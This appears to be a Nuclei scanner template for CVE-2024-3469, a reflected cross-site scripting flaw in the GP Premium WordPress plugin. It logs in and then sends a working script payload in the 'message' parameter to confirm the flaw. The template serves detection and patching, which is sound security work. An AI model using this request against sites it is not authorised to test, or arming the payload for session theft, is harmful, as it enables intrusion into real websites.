id: CVE-2024-3469

info:
  name: GP Premium <= 2.4.0 - Cross-Site Scripting
  author: Shivam Kamboj
  severity: medium
  description: |
    The GP Premium plugin for WordPress up to and including version 2.4.0 is vulnerable to reflected XSS via the 'message' parameter in inc/verify.php (lines 95-101), where a message passed with sl_activation=false is URL-decoded and used unsanitized in add_settings_error(), allowing XSS payloads to be reflected in admin notices.
  impact: |
    Successful exploitation allows attackers to hijack administrator sessions via cookie theft, create rogue administrative accounts, perform actions on behalf of authenticated users, and deface the website or inject malicious content.
  remediation: Update GP Premium to version 2.4.1 or later.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gp-premium/gp-premium-240-reflected-cross-site-scripting
    - https://nvd.nist.gov/vuln/detail/CVE-2024-3469
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-3469
    epss-score: 0.10068
    epss-percentile: 0.93268
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 1
    vendor: generatepress
    product: gp-premium
    framework: wordpress
    fofa-query: body="/wp-content/plugins/gp-premium/"
  tags: cve,cve2024,wordpress,wp-plugin,gp-premium,xss,authenticated,wp,vkev

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1

      - |
        GET /wp-admin/admin.php?page=generate-options&sl_activation=false&message=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains_all(body, "<script>alert(document.domain)</script>", "setting-error-license_failed")'
        condition: and
# digest: 4a0a00473045022100fc0900b0fb8177797484d6c3f0399b4a657e5ace53bf83a485604e0a21dd4b3b02207de51efae72289fd5a51528eccb594e27aad7c43f165eba0e431796daf5b882d:922c64590222798bb761d5b6d8e72950